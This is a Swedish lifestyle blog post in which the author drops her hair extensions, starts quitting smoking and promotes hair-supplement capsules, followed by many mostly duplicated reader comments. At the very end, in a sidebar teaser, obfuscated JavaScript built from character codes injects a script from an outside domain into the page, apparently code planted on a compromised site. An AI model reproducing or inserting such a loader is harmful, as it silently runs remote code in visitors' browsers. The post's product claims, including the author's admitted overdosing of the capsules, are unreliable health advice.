”så blir du av med drygt ett kilo utan att anstränga dig” 3:e dagen som rökfri!

IMG_9419

”Så här går du ner drygt ett kilo utan att anstränga dig” 😉

jag lutade mig tillbaka, Bobby fixade, allt löshår åkte ur och VIPS så vägde jag drygt 1 kilo mindre! hahahaha! 

IMG_9434

Hej fina du!  Efter en lång skön och ledig dag är jag hemma igen, klockan ringde tidigt imorse. (sova får jag göra i mitt nästa liv) Jag körde hem till Bobby och hämtade honom =)

Tanken var att vi idag skulle bytt ut mitt löshår. Dvs, plockat ur, färgat, satt i och klippt in. En procedur som jag har gjort  i ca 11 år! GALET lång tid!

Jag är löshårsexperternas expert! Men idag var det annorlunda. För jag fick en känsla av att jag kanske skulle vara utan. Bobby tittade på mig skeptiskt,

”Men My, du måste ju spara ut i fyra år om du ska vara nöjd med ditt hår” Vi skojade och diskuterade lite fram och tillbaka. Men när han tvättat och klipp och började föna håret så ändrade han sig… -ja kanske, sa han.

Hans kommentar jag citerade först handlade inte om vad HAN tyckte….. han sa som han gjorde för att han känner mig väl, och vet att jag älskar mitt långa lockiga hårsvall.

Så efter många om och men och en himmelens velande från min sida så klippte vi  dessutom bort allt slitet från mitt egna hår och valde att inte sätta i extensions denna gång. 

Tack vare att jag lyssnat på Bobbys råd. INTE blekt min utväxt, INTE plattat/lockat med för hög värme. Men framförallt för att jag använda Toupema belgal tejp-metod som är mycket mer skonsam för håret! (istället för keratin) 

Men även att jag lyssnade på Bobbys råd och testat och ätit hans Super hair kapslar i ett par månader.

DET har gett resultat. Inte bara för håret utan även mina naglar och fransar har blivit bättre! Jag är fascinerad över att man kan se skillnad på så pass kort tid. Men tack vara detta så är mitt egna hår så pass starkt att jag nu kan köra utan extensions…. Jag ska dock erkänna att jag överdoserar kapslarna något, nu i början…  

-Så vad tycker du om min nya korta ”egna” frilla? =)IMG_9412

Efter att vi var klara så gick vi till Fresco för att äta lunch med  Tobbe =) SÅ mysigt!!! Kul när skåningen kommer upp 😉 

IMG_9425 FullSizeRender IMG_9435

 

 Jag får se hur länge jag är utan. Just nu känns det toppen. Men vem vet, jag kanske faller tillbaka i löshårssvängen igen….

Men seriöst, ta en kik på hårkapslarna, DOM ÄR FANTASTISKA! både för män och kvinnor!!!! Du hittar dom HÄR 

Bort med löshåret, in med kapslarna och vips så kan jag ha en ”egen” frisyr igen =) 

FullSizeRender

Inte nog med hårförändring. jag erkände innan konkursen att jag börjat röka igen. som en skorsten! Jag skäms men så är det! Jag har rökt i stort sett hela mitt liv, sedan jag var 13 år gammal. Jag är uppvuxen men en mamma och mormor som båda rökte, inomhus. (så gjorde man då) jag har tränat och varit aktiv ändå. Jag har slutat i omgångar. Självklart rökte jag inte inför/under/efter graviditet. Men har fallit tillbaka igen, och igen. SUCK!

Förra året slutade jag i samband med min operation, jag skrev det öppet. jag var stolt och berättade det för. jag blev också stolt ambassadör för Cancerfonden. När jag sedan föll tillbaka vågade jag först inte stå för mitt snedsteg. Ville inte uppmuntra alla ni som hängde på mitt ”sluta röka” projekt till att göra samma misstag som jag. Så jag skrev ingenting…

Men ack så fel det blev i allt kaos, och min inner stress så började jag igen. ca 2 paket/dagen. HELT galet!!!! Jag VET! Men nu idag så är det min tredje rökfria dag, igen. jag lovar ingenting mer än att jag ska göra mitt bästa.

Utbildnings på SAFE Education är också en bidragande orsak. Samt att jag diskuterade detta med någon som på ett märkligt sätt fick mig att tänka om. (Tack) Där och då bestämde jag mig.

Jag skämdes över min rökning, jag kunde knappt ta mig själv och min ”hälso profil” på alvar.

Jag är dock grinig till och från. jag har abstinens och borde inte umgås med folk. MEN jag ska ta mig igenom detta. Dette är ännu en utveckling och ett kliv mot en annan och ny riktning i mitt liv….  

När vi satte oss vid lunchen tidigare idag så fick Bobby syn på ett paket cigg i väskan ”men du hade ju slutat?!” ja, men jag vill ha dom där… ifall, det blir panik! Det gick han inte med på… han filmade när han tog min cigg och kastande dom! haha! (Tack Bobby ) Du kan se den på hans instegar längst upp till vänster HÄR 

Nu ska jag, mitt rökfria jag och min nya frisyr och hårfärg för den delen också….. ägna oss åt att plugga, för imorgon är det skola igen =) SÅ kul!!!!!! 

Vi hörs sen! kramar

/ My Martens

PS ”klarar du det, så slutar jag också” sa min bloggkollega och vän Åza precis på en teledejt!  sån u j*klar är jag peppad, inte bara för min egen, Ludvigs och min framtida man skull… utan även för Åzas skull! 😉 hehe! Upp till bevis ÅZA! <3

181 Komentarer

 1. Skitsnyggt My! <3 Jag kapade också en rejäl bit härom veckan på inrådan av min frisör, känns toppen med en "lob" long bob och inte alls för kort, bara skönt.
  kraaaaam från Fia

 2. Otroligt Fint!!!!!
  Klär dig jätte bra och färgen-så Snygg!!
  Läser din blogg sen du var med i EMS, har aldrig tagit mig tiden att kommentera!
  Lycka till med Skola och allt!
  /Maria

 3. Jaha, där fick jag så jag teg. Det var ord och inga visor. Men ett ord är ett ord. Om du fortfarande är rökfri om en månad skippar jag mina kvällsbloss också… Du blev JÄTTEFIN i det kortare håret. Lite mindre Barbie, även om jag gillar Barbie-My också såklart!. Hehehe… ?

 4. Verkligen jättefin i din nya frisyr .Har tid på fredag för klippning och efter ha sett hur fin du är så kanske mitt långa , tjocka alldeles egna hår åker av ?.
  Och det där med rökning .Jag slutade röka för snart 2 år sen efter att ha rökt i 35 år och det är det bästa jag gjort ..så stolt över mig själv .
  Kämpa på !!!!

 5. Löshår fint, men låter som mycket tricks och cash… Tycker du ser super fräsch ut i din nya frilla, jättefin färg, längd, det ser väldigt naturligt och Du ut;-) Lycka till med skola och allt! kram

 6. Så mycket snyggare utan löshår. De där långa tjocka lockarna känns så ofräscht. Hur gör man efter träning? Tvättar varje gång eller går man runt med svettigt hår? Har aldrig fattat, då alla med löshår har torrt hår när de lämnar gymmet ombytta och duschade ? Eller så tränar de utan att bli svettiga! Så helt rätt beslut My!

 7. Men dra åt skogen vad snygg du blev!!!! Ärligt talat, vad har du väntat på alla dessa år, du är ju jättesnygg i ditt hår. Vilken alldeles grym frisyr och längd, du passar jättefint i det My.
  Kör på med tabletterna och lycka till med att inte röka. Har varit utan i 10 år nu. Yeay! ?

 8. Hur fin som helst utan löshår! Hela du blev sötare på något vis :)) Roligt hur mycket en frisyr kan göra. Du är grym och tack för all din ärlighet!

 9. Heja dig! Klart du klarar detta! Jag tror på dig iaf.
  Jättefin i håret blev du också. Kan ju vara skönt med en förändring i utseendet också när man kommer ut från en tuff period. Kram

 10. Din nya frisyr klär dig, du ser superfräsch. Jag tycker ofta att löshår ser lite ovårdat ut, alltså på alla. Det är sällan det är snyggt länge, utan börjar ganska snabbt se ut som om man behöver experthjälp. Den här frisören kommer nog också att vara skönare med allt ditt tränande och så. Tummen upp till dig och Bobby =)
  Och lycka till med rökningen. Tänk på att du gör det för lilleman också. Jag förlorade min älskade pappa (från ditt älskade Timmernabben), han hade rökt länge länge och kvävdes till slut till döds. När jag tänker på att han utsatte sig själv och oss för det så blir jag bedrövad. Kämpa!

 11. Håller tummarna att det går bra för dig med ciggen. Är själv rökfri sedan 3 ½ år. Såå himla skönt att inte vara slav under dessa cigg. Rökte typ 1½ pkt om dagen. Det enda man tänkte på var när man ska ta sin nästa cigg.. Och när jag gick till sängs så längtade jag till cigg och kaffe nästa morgon. MEN nu är det inte så längre. Nån gång bara får jag ett sug. Jag hade rökt i ca 30 år när jag slutade. Försök att hålla ut. Man sparar ju massa pengar och man luktar godare ?.
  Lycka till, hejar på dig!

 12. Du är så snygg i din nya frisyr. Du blev en ny människa, liksom. Ha aldrig löshår mer.
  Ditt egna hår är så vackert. En ny framtid med en ny frisyr, det passar så bra.
  Toppen att du slutar röka också. Kram på dig vackra tjej.

 13. Så jädrans snygg! Du behöver verkligen inte lösa lockar för att se bra ut, naturligt vacker och fräsch som du är! Lycka till med din nystart, fantastiskt att få vara med om i vuxen ålder även om det tar på krafterna. You go girl!

 14. Åh vad fin du blev! Du passar jättebra i det! Stort lycka till med ditt nya rökfria liv. Även om du trillar dit igen så gör ett nytt försök, alla försök gör en starkare. Det är 16 år sedan jag till slut lyckades att sluta röka, har inte tagit ett enda bloss sedan dess, jag vet att spräcker jag nollan kommer jag att trilla dit igen! Jag försökte sluta säkert 20 ggr innan jag lyckades. Så skönt att slippa ciggen!

 15. Sååå himla fin i håret!! Som ovan.nämnt ser du fräschare, sötare och äldre ut (på ett bra sätt ;-P!) jämfört med innan.
  Lycka till med rökningen ? !!

 16. Skitsnyggt My! <3 Jag kapade också en rejäl bit härom veckan på inrådan av min frisör, känns toppen med en "lob" long bob och inte alls för kort, bara skönt.
  kraaaaam från Fia

 17. Otroligt Fint!!!!!
  Klär dig jätte bra och färgen-så Snygg!!

  Läser din blogg sen du var med i EMS, har aldrig tagit mig tiden att kommentera!

  Lycka till med Skola och allt!
  /Maria

 18. Jaha, där fick jag så jag teg. Det var ord och inga visor. Men ett ord är ett ord. Om du fortfarande är rökfri om en månad skippar jag mina kvällsbloss också… Du blev JÄTTEFIN i det kortare håret. Lite mindre Barbie, även om jag gillar Barbie-My också såklart!. Hehehe… 😉

 19. Verkligen jättefin i din nya frisyr .Har tid på fredag för klippning och efter ha sett hur fin du är så kanske mitt långa , tjocka alldeles egna hår åker av 😱.
  Och det där med rökning .Jag slutade röka för snart 2 år sen efter att ha rökt i 35 år och det är det bästa jag gjort ..så stolt över mig själv .
  Kämpa på !!!!

 20. Löshår fint, men låter som mycket tricks och cash… Tycker du ser super fräsch ut i din nya frilla, jättefin färg, längd, det ser väldigt naturligt och Du ut;-) Lycka till med skola och allt! kram

 21. Så mycket snyggare utan löshår. De där långa tjocka lockarna känns så ofräscht. Hur gör man efter träning? Tvättar varje gång eller går man runt med svettigt hår? Har aldrig fattat, då alla med löshår har torrt hår när de lämnar gymmet ombytta och duschade 🙂 Eller så tränar de utan att bli svettiga! Så helt rätt beslut My!

 22. Men dra åt skogen vad snygg du blev!!!! Ärligt talat, vad har du väntat på alla dessa år, du är ju jättesnygg i ditt hår. Vilken alldeles grym frisyr och längd, du passar jättefint i det My.

  Kör på med tabletterna och lycka till med att inte röka. Har varit utan i 10 år nu. Yeay! 😀

 23. Tycker du är mycket finare i ditt egna hår! Har själv klippt av en bit av det slitna😊stort lycka till med skolan och livet💜Kram

 24. Hur fin som helst utan löshår! Hela du blev sötare på något vis :)) Roligt hur mycket en frisyr kan göra. Du är grym och tack för all din ärlighet!

 25. Heja dig! Klart du klarar detta! Jag tror på dig iaf.
  Jättefin i håret blev du också. Kan ju vara skönt med en förändring i utseendet också när man kommer ut från en tuff period. Kram

 26. Din nya frisyr klär dig, du ser superfräsch. Jag tycker ofta att löshår ser lite ovårdat ut, alltså på alla. Det är sällan det är snyggt länge, utan börjar ganska snabbt se ut som om man behöver experthjälp. Den här frisören kommer nog också att vara skönare med allt ditt tränande och så. Tummen upp till dig och Bobby =)

  Och lycka till med rökningen. Tänk på att du gör det för lilleman också. Jag förlorade min älskade pappa (från ditt älskade Timmernabben), han hade rökt länge länge och kvävdes till slut till döds. När jag tänker på att han utsatte sig själv och oss för det så blir jag bedrövad. Kämpa!

 27. Håller tummarna att det går bra för dig med ciggen. Är själv rökfri sedan 3 ½ år. Såå himla skönt att inte vara slav under dessa cigg. Rökte typ 1½ pkt om dagen. Det enda man tänkte på var när man ska ta sin nästa cigg.. Och när jag gick till sängs så längtade jag till cigg och kaffe nästa morgon. MEN nu är det inte så längre. Nån gång bara får jag ett sug. Jag hade rökt i ca 30 år när jag slutade. Försök att hålla ut. Man sparar ju massa pengar och man luktar godare :).
  Lycka till, hejar på dig!

 28. Du är så snygg i din nya frisyr. Du blev en ny människa, liksom. Ha aldrig löshår mer.
  Ditt egna hår är så vackert. En ny framtid med en ny frisyr, det passar så bra.
  Toppen att du slutar röka också. Kram på dig vackra tjej.

 29. Så jädrans snygg! Du behöver verkligen inte lösa lockar för att se bra ut, naturligt vacker och fräsch som du är! Lycka till med din nystart, fantastiskt att få vara med om i vuxen ålder även om det tar på krafterna. You go girl!

 30. Åh vad fin du blev! Du passar jättebra i det! Stort lycka till med ditt nya rökfria liv. Även om du trillar dit igen så gör ett nytt försök, alla försök gör en starkare. Det är 16 år sedan jag till slut lyckades att sluta röka, har inte tagit ett enda bloss sedan dess, jag vet att spräcker jag nollan kommer jag att trilla dit igen! Jag försökte sluta säkert 20 ggr innan jag lyckades. Så skönt att slippa ciggen!

 31. Sååå himla fin i håret!! Som ovan.nämnt ser du fräschare, sötare och äldre ut (på ett bra sätt ;-P!) jämfört med innan.
  Lycka till med rökningen 😮 !!

 32. Så fint! Tycker inte du ska sätta in extensions igen, mycket finare med ditt eget hår.
  Jag vet inte, du ser liksom fräschare, trendigare och mognare/mer vuxen ut (men på ett ungdomligt sätt) i din nya frisyr. Den ramar dessutom in ditt ansikte så fint. Supersnyggt, verkligen!

  • Nu kom jag på vilket ord det var jag sökte men inte hittade tidigare. Starkare. Du ser starkare ut i det kortare håret. Mera attityd/personlighet på nåt vis.

 33. Så fint! Tycker inte du ska sätta in extensions igen, mycket finare med ditt eget hår.
  Jag vet inte, du ser liksom fräschare, trendigare och mognare/mer vuxen ut (men på ett ungdomligt sätt) i din nya frisyr. Den ramar dessutom in ditt ansikte så fint. Supersnyggt, verkligen!

  • Nu kom jag på vilket ord det var jag sökte men inte hittade tidigare. Starkare. Du ser starkare ut i det kortare håret. Mera attityd/personlighet på nåt vis.

 34. Jag har inte kommenterat här förr (är så låg nivå i kommentarsfältet tycker jag), men nu måste jag för jag tycker verkligen du blev SKITFIN i ”nya” frisyren!! SÅ BRA!

 35. Morning
  Så fin du är i håret. Strunta att sätta in löshår igen.
  Det ser verkligen naturligt ut!!
  Jag har tyckt det sett hemskt ut på bilder när ni stått på rad 5-6 st med ert löshår och sett likadan ut som Barbie-dockor.
  Heja dej som inte tillhör dom igen.
  Trevlig dag

 36. Så fint det blev utan löshåret.Ser mycket friskare och fräschare ut. Klart du kommer att fixa att sluta att röka,kommer vara jobbigt ibland,men du kommer må så mycket bättre. Lycka till.Kram

 37. Varje cigarett gör ditt liv kortare, så sluta bara! Säg inte att det är ”svårt” ett hån mot alla som försöker bli friska från cancer… Där kan man snacka ”svårt”. Du har ett val! Kriga som du gjort för sina företag, Lilleman mm Du fixar detta! Verkar va en grymt duktig tjej! Heja!

 38. Jag har inte kommenterat här förr (är så låg nivå i kommentarsfältet tycker jag), men nu måste jag för jag tycker verkligen du blev SKITFIN i ”nya” frisyren!! SÅ BRA!

 39. WOW WOW WOW…….SÅÅÅÅ himla fin du blev i nya frisyren.
  Sätt inte i löshår igen, detta är mycket finare.
  Hälsningar Skåne.

 40. Så snygg du blev, är så trött på alla tjejers långa Barbiehår.
  Men förstår inte att du röker, du som är så hälsoinriktad. Tank på det när du blir PT, man känner ALLTID när nån luktar rök, går ej att komma ifrån och jag tror inte nån vill träna hos nån som luktar rök, det finns i varje por i kroppen.
  Min bästa väninna har rökt ca 5 cig/dag sen ungdomen , nu ligger hon hemma med inoperabel lungcancer med många metastaser i skelettet, har skitont och ingen bot finns. Tänk dig in i det, jag vill bara gråta.
  Nu tror du väl att jag aldrig rökt, men det har jag, ca en ask / dag!! Slutade för många år sen och helt tvärt. Hade bestämt mig. Tack och lov gick det bra,var lite stingslig nån månad men det går över.
  Lycka till nu, hoppas verkligen att du kan sluta, tänk på Lilleman!!
  kram

 41. Sätt aldrig i löshår igen! Du är otroligt fin i denna längd på håret och helt ärligt har löshåret tidigare inte varit till fördel! Men, man ska ha det man trivs bäst i men eftersom du ställde frågan delger jag min åsikt! Snygg tjej i naturligt hår!

 42. Morning

  Så fin du är i håret. Strunta att sätta in löshår igen.
  Det ser verkligen naturligt ut!!
  Jag har tyckt det sett hemskt ut på bilder när ni stått på rad 5-6 st med ert löshår och sett likadan ut som Barbie-dockor.
  Heja dej som inte tillhör dom igen.
  Trevlig dag

 43. Så fint det blev utan löshåret.Ser mycket friskare och fräschare ut. Klart du kommer att fixa att sluta att röka,kommer vara jobbigt ibland,men du kommer må så mycket bättre. Lycka till.Kram

 44. Varje cigarett gör ditt liv kortare, så sluta bara! Säg inte att det är ”svårt” ett hån mot alla som försöker bli friska från cancer… Där kan man snacka ”svårt”. Du har ett val! Kriga som du gjort för sina företag, Lilleman mm Du fixar detta! Verkar va en grymt duktig tjej! Heja!

 45. WOW WOW WOW…….SÅÅÅÅ himla fin du blev i nya frisyren.
  Sätt inte i löshår igen, detta är mycket finare.
  Hälsningar Skåne.

 46. Så snygg du blev, är så trött på alla tjejers långa Barbiehår.
  Men förstår inte att du röker, du som är så hälsoinriktad. Tank på det när du blir PT, man känner ALLTID när nån luktar rök, går ej att komma ifrån och jag tror inte nån vill träna hos nån som luktar rök, det finns i varje por i kroppen.
  Min bästa väninna har rökt ca 5 cig/dag sen ungdomen , nu ligger hon hemma med inoperabel lungcancer med många metastaser i skelettet, har skitont och ingen bot finns. Tänk dig in i det, jag vill bara gråta.
  Nu tror du väl att jag aldrig rökt, men det har jag, ca en ask / dag!! Slutade för många år sen och helt tvärt. Hade bestämt mig. Tack och lov gick det bra,var lite stingslig nån månad men det går över.
  Lycka till nu, hoppas verkligen att du kan sluta, tänk på Lilleman!!
  kram

 47. Sätt aldrig i löshår igen! Du är otroligt fin i denna längd på håret och helt ärligt har löshåret tidigare inte varit till fördel! Men, man ska ha det man trivs bäst i men eftersom du ställde frågan delger jag min åsikt! Snygg tjej i naturligt hår!

 48. Åh, så fint det blev !!! Nu ser man dina fina drag i ansiktet och inte bara en massa hår.
  Nytt liv och ” nytt hår”. Fantastiskt !
  Kram

 49. Åh, så fint det blev !!! Nu ser man dina fina drag i ansiktet och inte bara en massa hår.
  Nytt liv och ” nytt hår”. Fantastiskt !
  Kram

 50. Så mycket vackrare i din nya frisyr. Det blir alltid en sån stel och konstlad frisyr med löshår och hur mycket 2016 är det egentligen med superlångt hår? No no!
  Det lustiga var att jag gick förbi Fresco vid kvart i 2 igår och såg att Bobby satt där men kände inte igen sällskapet. NU ser jag ju att det var DU!!! Kände ju inte alls igen dig i ditt nya snygga jag….Kram

 51. Jäklar så snyggt det blev, med ditt ”eget hår” Hoppas du fortsätter ha det så.
  Du blev förresten väldigt lik Hannah (Graaf, Magdalenas syster)
  Lycka till med rökningen, eller att sluta kanske jag ska säja och allt annat du har framför dej!

 52. Så mycket vackrare i din nya frisyr. Det blir alltid en sån stel och konstlad frisyr med löshår och hur mycket 2016 är det egentligen med superlångt hår? No no!

  Det lustiga var att jag gick förbi Fresco vid kvart i 2 igår och såg att Bobby satt där men kände inte igen sällskapet. NU ser jag ju att det var DU!!! Kände ju inte alls igen dig i ditt nya snygga jag….Kram

 53. Jäklar så snyggt det blev, med ditt ”eget hår” Hoppas du fortsätter ha det så.
  Du blev förresten väldigt lik Hannah (Graaf, Magdalenas syster)
  Lycka till med rökningen, eller att sluta kanske jag ska säja och allt annat du har framför dej!

 54. Sätt INTE dit nå löshår igen. Du ÄR så fin i ditt egna! Skönheten sitter INTE i håret
  Ang rökningen så ge helt enkelt bara FAN i det. Du vill inte sitta som min mor när du blir äldre. KOL
  Hon orkar inte ens till affären längre

 55. Sätt INTE dit nå löshår igen. Du ÄR så fin i ditt egna! Skönheten sitter INTE i håret
  Ang rökningen så ge helt enkelt bara FAN i det. Du vill inte sitta som min mor när du blir äldre. KOL
  Hon orkar inte ens till affären längre

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/